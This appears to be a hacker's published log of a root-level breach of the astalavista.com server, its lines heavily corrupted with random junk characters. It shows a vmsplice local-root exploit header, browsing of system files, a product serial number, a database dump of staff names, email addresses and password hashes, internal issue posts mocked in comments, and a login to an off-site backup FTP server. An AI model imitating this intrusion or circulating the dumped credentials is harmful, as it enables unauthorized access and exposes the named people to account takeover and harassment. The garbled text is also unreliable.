drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system9 z/ L$ t: |8 s5 z$ J
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history7 _& H. a R1 A. x( w9 ^
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout1 P2 L# {7 N" w! {8 [: J0 j1 M
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
9 y/ h& M4 e5 b8 B% V-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc6 Z0 }& |3 T+ u
drwx–x–x 3 com com 4096 Jan 29 2008 domains
8 o0 F$ u! t( }# n. ?-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
, Y- Z& L% {! V o1 Z% i8 Xdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
& c+ f( J' R- s, E. C-rw——- 1 com com 69 Nov 18 2008 .lesshst
& j5 p) Y. n9 w9 _drwx—— 2 com com 4096 Sep 24 2007 mail2 z2 r4 D, H% G) U
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
# M, Z( v q' H! o# Tdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp7 I* y- E8 k3 c" B
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
/ f* e, y ?' d-rw-r—– 1 com mail 34 Sep 24 2007 .shadow+ Z2 `3 i) h& S- o1 l& {# {/ b+ w
drwx—— 2 com com 4096 Aug 26 2008 .ssh* T' {& W( X% {9 P7 h# \" _& w
-rwx—— 1 com com 8515 Feb 10 2008 t. Q( d% @8 X8 X) y" g
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c/ X D6 H! _+ F/ ^ ?; e3 r( j# ?
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp( Q8 j8 ]4 F+ H3 Q& x7 ^" p" Q7 v
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
& y; T8 ]* ?3 q) Z6 g) m, L-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql( d8 t3 j" M j2 p
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo4 \6 B1 `5 n7 k+ y n
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
* t7 t9 G; R) D5 J* J: r4 [2 Q
. s4 T' ]& w' k6 ~sh-3.2# head t.c# S. M+ R8 n. \0 n8 C
/*
5 X* g. Y+ E5 b! [* jessica_biel_naked_in_my_bed.c
( A" h, {7 q m7 @) f6 X*
( w( l8 \. h [1 {* Q* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.$ ?( O5 T$ G$ m2 q& T y
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.7 K! p) Q- X7 m" t3 z! N+ ]
* Stejnak je to stare jak cyp a aj jakesyk rozbite.! \% D+ u! c! o3 }0 p
* S, z) x) p( G* ^$ e- M1 u
* Linux vmsplice Local Root Exploit
- ~& g( c; T2 O. x1 U* By qaaz
6 g, R6 P Q5 @: J! n0 l Y. F4 m2 h*
0 C6 t3 l( B S; N f! Y- m* Q1 g+ l8 }- c9 R$ s
sh-3.2# cd /
6 E& q& ^2 `. `9 Hsh-3.2# ls -la5 \! M, ~6 |% h
total 360: \9 d3 g, O( I- q$ C8 a; M0 \. R" `+ r
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .# T6 _, X. w# k7 i' K# n/ ^
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( ]' c ?0 S I. M$ E
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group* [& U# I) T( u) o
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user" R7 j3 P @7 S9 [- p. Y
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
# ]3 V6 T" s. D) T2 {-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
& N' a0 T& m' _& Z7 U+ O-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel$ M2 m. K' l; H" Y( Y" E* O
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup4 u& i+ {8 T2 j- Z9 y& Z; I
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin; u* F) ?7 l5 z
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot6 u# w4 z0 ?% [) Y8 H+ U
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev0 i5 v1 V; `) ~
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
* B4 h5 h2 U" |$ Q- fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
0 g' ^2 _) t3 c1 Q4 P-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf6 b8 y' U8 n% k4 I
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib, }. e$ _& M! t' r5 z- \& D( C. ~
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib644 x; R8 @) U2 J0 t
drwx—— 2 root root 16384 Sep 11 2007 lost+found
( j1 P& t+ c( z; ]9 S$ |drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
, S7 o# W! x7 C* Q" c; |" {! cdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc) S3 ]7 r( P n
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
9 n1 G2 A2 W b8 p& a4 i$ K" R-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg# W- b) a7 B4 H/ w
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
5 }4 R5 ?9 I5 m& W4 u; C: ~. Q* Qdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
8 S1 J: p9 j4 W+ \/ _5 [2 {7 Rdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc5 H% d3 ^" I* F7 p4 {: \
drwxr-x— 15 root root 4096 Jun 4 08:40 root! `( j0 n& m9 m* i( w9 M$ }1 S \- b/ g
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
0 \4 E4 v- u6 A0 K4 K3 G. Tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
$ |+ l( G: m4 U2 xdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv7 C3 m% Y8 o H/ U
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
5 Q+ W! t! ~& p7 `drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp: h; v" W; k6 Q3 Y ~
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
3 ~; |9 i; e6 g0 ddrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
; q6 n( r' k- j) L' _1 v; O R: l: f/ |" _, R" c: W" }7 ]
sh-3.2# cd opt8 `% c( k0 n6 K+ \8 [2 O/ j
sh-3.2# ls -la
9 v% a( R0 J- ^7 c+ ototal 200 `2 H' P/ ], N+ q5 s& A6 u
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
$ w& W% D1 m! k# C( hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ I7 Y8 c4 @. d/ H
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
, n4 L8 Z$ c0 h# K9 g6 \
) v) ^9 M# `; o9 w3 [sh-3.2# cd lsws/
8 ~( i8 h2 w* o; J5 Esh-3.2# ls -la: ~- l5 I" T. B8 g: T9 h+ C) t& O
total 108
/ `' L7 S" R) s8 cdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
% o4 x a$ U: c* h: \6 E& }drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
) E l0 i- G# s( \drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons) V; J0 E& ^. |7 }9 O: \6 R
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
{- r( _ f9 ldrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
) u, s- l. w% B) |& `. q: k! odrwxr-xr-x 2 root root 4096 May 29 15:10 bin5 j. j8 b& h: |* L2 v% m x
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
4 k# H4 K0 k) \; W' H9 O1 Fdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
1 k! h5 f9 K3 f8 d: V3 g: p7 w+ Tdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
) D2 `4 Y, T/ Idrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
) q+ \% a6 O' a- A" Rdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
/ r9 ^) K# C/ z( f2 y6 J-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
% |8 g4 r+ i0 \% e* }& q0 k/ r" B& _-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP' N* F; r1 |7 B0 Y6 @6 b
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
1 r; [+ `% s8 m* {& Y7 M: y* n-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
+ _, G+ {+ k# o6 O! R1 u( idrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
$ z3 Y6 s4 ^: J- ~$ Ydrwxr-xr-x 2 root root 4096 Mar 20 2008 php7 }( b* R# J: k& x( P" M( v7 C
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild$ z; ^0 l, A+ d5 k; G; E' Y% J
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
6 _- \ k" ]2 `2 P2 @' R-rw-r–r– 1 root root 6 May 29 15:10 VERSION
& @# h4 B* N+ A; q4 `( k$ |
3 R% ~ s7 _$ h+ A$ F6 Ysh-3.2# cd conf8 {! g3 y# X% ?" @6 m; L2 ]3 v
sh-3.2# ls -la
( w/ }: r- t( M% D% @3 Btotal 489 U9 K9 F- g- t* k8 Y7 W
drwx—— 4 apache apache 4096 Jun 3 02:43 .
# P+ x9 Q! e" g# z+ H! Ldrwxr-xr-x 15 root root 4096 Mar 20 2008 ..8 I5 k" ~! d: C/ K7 y S
drwx—— 2 apache apache 4096 Mar 20 2008 cert* \ V$ a6 A* F. i: C# m- a4 C# E
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml: A: d1 `! M+ r4 X* L: T& Y& A" t
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
6 Z4 K2 p$ n5 a( x% H& |-rw-r–r– 1 root apache 0 Jun 3 14:11 .last7 z N' z5 X+ [& D% R; a _
-rw——- 1 apache apache 256 May 29 15:10 license.key
) p! ^* }: p/ y) {7 D5 q4 l* j9 t8 E-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
' Q, {* U* y O0 L3 Y" k0 d9 p-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
1 C" Y3 V2 Z1 K: Q+ z" v% R% q* N-rw——- 1 apache apache 20 May 29 15:10 serial.no
. m$ R3 u; m0 {' Pdrwx—— 2 apache apache 4096 Mar 20 2008 templates0 b2 K; V# y! [# B$ q/ W
: }# q f+ a! P6 z" Y2 L/ F/ T
sh-3.2# cat serial.no4 L# h' \3 _- L7 m+ Q9 p
IbDl-oVsO-CKqL-wVRa
. N5 K1 k H6 [2 H
, h. e. Z& q6 {, {4 x1 W# [sh-3.2# mysql
" v$ H% ^, C9 A6 w" fWelcome to the MySQL monitor. Commands end with ; or \g.
* S( o4 U$ l6 J6 w8 s2 QYour MySQL connection id is 286844
' D8 m: T, A, n% ~' j) cServer version: 5.0.45-community-log MySQL Community Edition (GPL)
% T% v* u: }+ ?( `% a2 N" k# _9 P0 H5 W
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 A4 M6 p0 W0 U3 P
& U/ N9 X$ E% O$ x% R/ Jmysql> show databases;
; F. d4 y9 }( I; x4 z- H9 v$ l. E+———————–+6 T0 V$ _% j( D2 p/ v1 j$ J+ H
| Database |6 ~1 n2 p( F- ]1 \, V: ~9 r( m0 G8 f
+———————–+
$ R2 u }) W# s1 g| information_schema |
# X! S- ~3 z! @& v! u| astanet_ads |2 E$ E5 p4 f$ x8 ^; r
| astanet_mailing_lists |4 i- ?* A) t) t2 T
| astanet_mediawiki |; J' b9 A& w4 V& Q
| astanet_membersystem |4 P2 [. z* E3 d2 I
| com_contrexx |% x9 b) N8 H4 D' b& n9 [- P+ p8 e( Z
| com_contrexx2 |( m, q t# ?' x( n
| com_contrexx2_live |
* L- s8 t$ M; ~8 L- f* a| da_roundcube |
, O b) d/ ?% {) } U) ~| dolphin |5 K. p" \! ?# f3 n
| ideapool |
) V" Z' J5 _. r7 B| mysql |8 v; |4 l: N( T+ v/ Q$ P
| test |+ Y B* c. R( `' P: x. D y9 E
| yourmaster |& Y8 a Y6 r/ s6 v5 @' i1 z M
+———————–+
& a% M# S# R) q+ o/ C14 rows in set (0.00 sec)' f' A1 W# [: V, M; L# I y" i
) `. i( n: r+ Q& Z2 Emysql> use ideapool
: P {" y" Z/ K: n4 Q y6 ?+ `! JDatabase changed
z9 o; M M& c; s' j& umysql> show tables;, x; P) t) t, E: |: K$ S8 n9 O
+———————————–+3 j/ e3 F2 @ W' g0 n
| Tables_in_ideapool |
8 L$ G, t, N( D8 P+ K+———————————–+
# _5 i+ I3 Y, `+ [9 q) `8 V| eventum_columns_to_display |
! `0 S! O S* r5 G$ _5 y: ]* C| eventum_custom_field |
8 w1 J( ~9 U! ` E: J# S| eventum_custom_field_option |
r9 e( Q5 m( {5 J0 N2 s| eventum_custom_filter |$ h( l+ m: Q% p1 e+ l, y8 R9 [
| eventum_customer_account_manager |
( b& M" w t |# S R! a& Y9 h+ F/ k| eventum_customer_note |0 M5 r9 O$ Y2 S3 c
| eventum_email_account |* P$ B- v1 B+ g) ?0 b
| eventum_email_draft |
- s# y& j" O1 Y| eventum_email_draft_recipient |
! {2 J1 }% U7 @6 U" ?1 J# z' f* ^| eventum_email_response |/ c) {6 i6 l. @1 [" ~4 r
| eventum_faq |) Y1 O) i; I5 l* \
| eventum_faq_support_level |6 Q8 Q- x3 c6 w ]) v; U
| eventum_group |# t5 r! s6 V1 N8 A
| eventum_history_type |
- f$ C# [) y' ~4 J! B% f3 t* N| eventum_irc_notice |9 U% I7 i$ b( i3 D% Y
| eventum_issue |/ e) k+ k$ } }+ Y/ {
| eventum_issue_association |
- [, p* [ P) N& }, l| eventum_issue_attachment |+ j8 q% f( E W2 Y9 |
| eventum_issue_attachment_file |' P) r6 l6 j0 @9 ?" X0 X
| eventum_issue_checkin |' S6 a% i: b; Z4 q
| eventum_issue_custom_field |+ M- u5 Z7 R& g3 Q& r
| eventum_issue_history |
3 f3 I4 k G; d, m& p| eventum_issue_quarantine |2 J f: n* X8 J$ B9 Q ?4 d
| eventum_issue_requirement |
# E% R. d% n/ v. Y| eventum_issue_user |! G3 V ]: d+ ~/ I; S6 w
| eventum_issue_user_replier |
5 o( M6 }/ a+ l. _9 W7 ~) @| eventum_link_filter |
3 `+ w, p9 ~* X Y| eventum_mail_queue |
3 _- m' \7 |5 [. y( v0 R" r| eventum_mail_queue_log |
: c+ i1 U# E) p; Z: K| eventum_news |
. C8 [1 O! u# {7 G| eventum_note |
" e4 k( t, } v9 V& ]: B| eventum_phone_support |& t9 Q( l [9 W I) A
| eventum_project |
5 b4 R: W( d9 M0 t; k: T& ^# _- V7 P) L| eventum_project_category |& c1 V$ G( {4 J7 C$ }) K1 g
| eventum_project_custom_field |
' B- F. O. Z% y. Y: t9 [| eventum_project_email_response |
7 A; d0 b4 T) q$ Q5 u7 O| eventum_project_field_display |
6 r. W5 E. N% S% V# O| eventum_project_group |- B- y4 Z% z) b1 @- t
| eventum_project_link_filter |! A5 M; [( d1 Q7 a4 ^1 J! u
| eventum_project_news |
; V3 ^6 U5 r$ R; K1 X+ G4 R" W+ || eventum_project_phone_category |. _- {& H# S7 L- P$ f. K- r& {. I
| eventum_project_priority |9 F- z5 s- a4 ?; C! j
| eventum_project_release |
+ z' x$ B" m8 I: e+ ~5 n/ r| eventum_project_round_robin |; w1 F C+ m# x7 F" _; W+ p8 R
| eventum_project_status |3 C8 Z8 f8 D' Z6 B' x1 |
| eventum_project_status_date |' x0 `# R5 X3 c/ f' f1 ]0 z) g
| eventum_project_user |$ P! w* _3 ~0 z2 N
| eventum_reminder_action |
7 f' Q2 p" N+ x: @9 @% e! e| eventum_reminder_action_list |
: [" A2 Y1 h" ]: n/ W- @| eventum_reminder_action_type |
9 U- O. ]$ ?0 d( y j| eventum_reminder_field |: f: `/ ^$ d0 q/ I) ?
| eventum_reminder_history |; S) |0 l1 Y/ l M
| eventum_reminder_level |7 m. p. ]/ \# r& w/ H
| eventum_reminder_level_condition |, T7 \/ @* u' v% P! G
| eventum_reminder_operator |( Z5 T! _2 T$ h! y2 K! g \
| eventum_reminder_priority |+ L j# t: a/ {) @ d
| eventum_reminder_requirement |2 m+ q" t4 E6 q4 v/ R+ z) `
| eventum_reminder_triggered_action |, C. \; Q( r3 L
| eventum_resolution |6 w) H- _7 l) ^, k" ^
| eventum_round_robin_user |
( U5 ]7 K5 N) i! X& S ]| eventum_search_profile |
! m; b2 G& P/ u+ P| eventum_status |
' D$ p5 d$ @* V+ y& b| eventum_subscription |, G" u2 G! V: `/ y/ y, x; |
| eventum_subscription_type |/ ?9 T# i# D4 A) m, |# I" Z
| eventum_support_email |3 {* P1 ]# G- s
| eventum_support_email_body |8 d4 i5 M* |1 \, P7 Q& y* P
| eventum_time_tracking |
2 d" w/ K0 Z( {1 ~. `8 l( x! y| eventum_time_tracking_category |$ y3 ~' x. ^# Q9 O
| eventum_user |
) _7 g- `3 m& F1 R+———————————–+& J0 o% l8 J2 n3 m; m9 t
69 rows in set (0.00 sec)# A% k2 N# e7 S: V9 }& Q
+ C9 z/ y M4 i" L4 v5 k4 v
mysql> describe eventum_user;
8 G6 d# p9 \& m' }+————————-+——————+——+—–+———————+—————-+/ Z2 q! s Y8 [
| Field | Type | Null | Key | Default | Extra |# |4 {+ R/ v0 h* f
+————————-+——————+——+—–+———————+—————-+5 d- `$ y# p# r" i3 g7 C* S. N9 L7 i' v
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |7 E, N+ k/ o0 z: B* x
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
$ e! N6 @# _- M| usr_customer_id | int(11) unsigned | YES | | NULL | |
- J- p, A; S& Y& k5 r5 l| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |! ]) R8 L4 p; a% u; x
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |8 w3 I7 b7 ~, p6 b7 N& K( L
| usr_status | varchar(8) | NO | | active | |
$ X ]# g% y' K$ b$ f. A$ G3 f| usr_password | varchar(32) | NO | | | |
& a& c1 c! Z! X# i) r. G; X# i$ q! H| usr_full_name | varchar(255) | NO | | | |; ]1 }" l; _4 R
| usr_email | varchar(255) | NO | UNI | | |8 X3 N7 }* Y: _( p& }( S/ ?0 `
| usr_preferences | longtext | YES | | NULL | |9 z2 \: V( H( _3 p/ r
| usr_sms_email | varchar(255) | YES | | NULL | |
/ i+ q: P$ k8 s3 G/ i" t| usr_clocked_in | tinyint(1) | YES | | 0 | |
" H3 _" ?6 E6 k) x! t| usr_lang | varchar(5) | YES | | NULL | |
2 a: r5 R' _! @6 K+————————-+——————+——+—–+———————+—————-+9 \& d' B; P$ y4 h
13 rows in set (0.00 sec)" o2 c) ~ J) q. H2 w
$ q7 H8 f* J5 smysql> select usr_full_name,usr_email,usr_password from eventum_user;
% b7 y+ N1 T* ~! c' I+———————-+——————————-+———————————-+1 t8 V2 B. Q" g2 \5 {! u
| usr_full_name | usr_email | usr_password |1 f9 ~5 F' y7 v7 ]' j
+———————-+——————————-+———————————-++ u1 ?. _( D; G- w) s
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |0 {5 Z% u+ G% f( ?
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |* o! R( d% y' t' q
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |7 m4 k# C) C) B, e; H8 ^' d, w
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
. \# _& c0 G6 x5 a% [| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |' K9 k) [! v& z$ E2 b9 \
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |# r3 A: m$ E/ n" M f" r5 _
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
1 _; \$ R. \: H| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
% }/ B0 ?9 A% {( t, [& I| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
# h" c- I5 O$ ?3 H h; J, j! n# [| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
# D7 j5 T1 Z9 `6 W" r| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |" R: v: T L: X$ Z. y
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
+ l m; H; Q0 p4 [. n+ T% ^| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |4 i0 T* U7 }. {( m: [! F
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |9 f! a1 j( h7 ~. `
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |2 u+ k( `3 ]' W0 F4 ]
+———————-+——————————-+———————————-+
+ ?% p1 B: D7 \6 [5 s: L15 rows in set (0.00 sec)
+ N, y: H* A5 B) _7 g/ z. z+ j. G7 R- w9 W4 @. b; }/ F! L% x5 D! u3 A6 ]
mysql> select iss_description from eventum_issue where iss_id = 43;8 E0 A. f( |" g, P* B! M1 w/ Y# Z
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+3 t1 F* P f# V
| iss_description
& D& d" v) N$ Q; m: C|- r1 r7 [. B+ m* w
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! Q: N& z( U8 I d, R9 L) m: I4 v, J| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be9 x4 p. [' E5 T5 D9 C# _2 d ^) a1 _
connected for 90 mins… 120mins… so what i propose is something like:
" X, M" t- O$ ?$ U e9 V链接标记[url]http://www.surfthechannel.com/[/url]
' }' q9 g4 E# o; Dsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
- o/ X) E N- A3 X. A# N, Clike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
' }. U& A+ l* R4 |, b7 Kbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
! N1 N0 q4 k- _if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…9 ]1 g4 i4 J2 E8 e6 J
: V0 F# f( G0 ` M9 e& O( HWe could also put advertisement during play on the flash video player itself… extra $$…
4 _: c& R2 [: u1 {3 F
0 \( Y8 ^4 ?. k4 D% vBy sykadul |8 g2 a0 B3 `% ]* V' {
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
, n& y% b) B5 T7 Z- e1 row in set (0.00 sec)
4 \" p$ w# M& J3 L: G
, x& @) f# U% f6 x) f// Money and extra $$ is all they care about. remember that.
( x2 _+ Z- F j- K( g' n/ w1 T- H5 B
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
$ U- f( g: u P. K# ?+————————+——————————————————————————————————————————————————————————————————————————————-+6 ?' w( G6 q& z; ]$ G" H: U
| iss_summary | iss_description , f9 f- C( }( N2 I6 w+ X
|8 g/ ~% l W8 P. C- Z+ \: X
+————————+——————————————————————————————————————————————————————————————————————————————-+, w/ q6 d6 I/ `* ^
| Forum for REAL EXPERTS | Hello,
h {* I" ?8 C7 @
, V6 |1 x& o/ }. d" u4 {! Y, JIshtus and I,, p9 K9 {7 Y! k0 G
2 ]6 w- @% g9 D( O' LCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide' d3 r- ?; j0 B& x6 T
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..5 _( B& m& ?6 A2 D5 l$ a. @
' y$ U( W4 Y S3 i4 \- r/ l, wOne example a friend of mine from coresecurity.com!2 b u* p0 r3 {: f; W; @
+ X" Z" E# }# S8 XWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..% v8 [3 B' E/ k5 L- Y5 Y1 x8 h
" \ F$ ? t0 s2 Z5 ?( R5 f* b|) o8 { Z# E4 ^% V- W, u9 t+ A. H
+————————+——————————————————————————————————————————————————————————————————————————————+2 c: s" _5 w* c% u+ w
1 row in set (0.00 sec)
! |- L, ~+ X+ E I! t& [
' {. q. `4 G2 [ d6 ~9 V// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
& M K* E1 W4 Z; X5 k2 {
2 R0 e" x; y) a8 K" vmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
" K2 @2 r8 T1 r; X" |2 O1 Q7 G+——————+———————————————————————————————+
3 l: d# Z5 _3 [ j( O' s3 y- n| iss_summary | iss_description |2 @9 n6 @7 f8 k* f: O! ^. i% U
+——————+———————————————————————————————+$ @/ ~0 i; D8 Y: B) G9 H# j
| Website guidance | Virtual Girl which guides you trought the website.
t7 d4 k$ q8 j. A( @
& ^1 I% T, k- v/ `We need a girl with who you can ( talk )!!!8 g1 k9 J" ]1 u. F& }7 H- Z
Also for the News!- C4 X# g, t, p& Y
So my suggestion is a girl who read you the news loud if you like!# _4 e3 M, i+ Y! k3 }. D
you can choose between read yourselfe or she read it for you or both!: j* j7 T! X# ~% \, s2 w2 ?4 d4 ~1 ?
5 l2 G5 [4 W* L& r, g. P
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
+ j; {6 m( I$ F0 M5 Y7 G- m8 I* A& t2 o$ H
Have a look on the example girls!!
; t* c- G1 S; }, ^* K) ]0 T5 B" M, f. u% x( |& I! L& X8 J
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]" u7 i9 a" j+ {9 U1 \0 i' B5 \
3 z& _) `- L3 J
or that( r1 T" x A% Y O) m
3 k( p: B2 C5 [1 L/ r$ p
链接标记[url]http://www.yellostrom.de/[/url]
& O0 V* e+ a. [4 j, I
3 ]/ D* u: X/ ^* N5 C2 z, t6 e- R9 \|( [: w3 |0 }) n1 Q1 n% K) G6 m# m
+——————+———————————————————————————————+
7 m$ T# t' J# L: @$ Q7 _1 row in set (0.00 sec)
* d# ]6 { ]& e8 @( H) L6 j# P% W; F. g, {/ W
// ha ha.
+ B$ m8 z9 F/ a d7 [+ k
|" @$ n6 h7 o$ s8 D7 g/ Wmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
9 o" t" p! ?, c$ h7 R: i+————————–+———————————————————————————————————–+' h7 B8 g" ~* Q
| iss_summary | iss_description |7 T; N4 S# Y( q8 p
+————————–+———————————————————————————————————–+
3 Y* t* B( m: A' A! {| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |) ^+ n7 S0 O+ ^' h5 B% @5 A3 D
+————————–+———————————————————————————————————–+9 k1 G r+ C+ t/ t: C- y8 V
1 row in set (0.00 sec)4 b% x/ ]) Z7 ?* ^1 d
+ S) [. ^7 b# P, R: F( Z" f// LOL.
. C& o( t5 q& N4 E3 i" K7 r4 d s6 i7 S& g) L/ m
mysql> exit4 Q2 J+ Z2 x7 k. z/ D" T2 |
Bye
$ B* k" k. p( O
: d5 o4 P, {8 ?+ i2 F$ d0 esh-3.2# ftp 212.254.194.163
; a8 K; p' I- w8 X) C- ^* `Connected to 212.254.194.163.
' A0 H. S9 W F/ v' [220 BackupCOM_VW FTP server ready.
9 X2 \- A" a! |; M4 k504 AUTH: security mechanism ‘GSSAPI’ not supported., ?3 [; `1 e7 t. r# l- V7 c+ Y3 w5 t
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.; ?+ ]( D' {, F4 z! T, ~
KERBEROS_V4 rejected as an authentication type
2 c+ A; G1 j7 T7 B; SName (212.254.194.163:root): astalavista.com
+ z4 T! W$ r/ l+ k# c331 Password required for astalavista.com.
2 U [& P# g5 c7 T' w1 vPassword:
% \$ D9 h8 G. W( C1 D230 User astalavista.com logged in.* }4 A- S: C; k" i% W( i
Remote system type is UNIX.
% I5 @+ d8 ?! }+ g' GUsing binary mode to transfer files.
l) a% K' H6 C; n4 ?1 @ftp> ls -la
0 K0 V) h+ p7 I+ h0 y/ ?/ w227 Entering Passive Mode (212,254,194,163,2,188) |* }4 K$ y `* a7 Z
150 Opening BINARY mode data connection for ‘file list’.
( ?: M7 G9 j( m# ]dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com* M; H: v+ c( j* k+ i* A! f
226 Transfer complete., t7 O0 {, E; l4 X0 j0 f s. V
ftp> cd astalavista.com: ]! H! U6 {, H% ]4 S* w
250 CWD command successful.
. n. y6 q) y( b# j' v. G Xftp> ls -la
/ a2 H6 a# p4 t; T227 Entering Passive Mode (212,254,194,163,2,189)& B0 x8 J* \$ U8 b
150 Opening BINARY mode data connection for ‘file list’.
) t9 H8 V) b9 H( `2 H6 I& Q-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
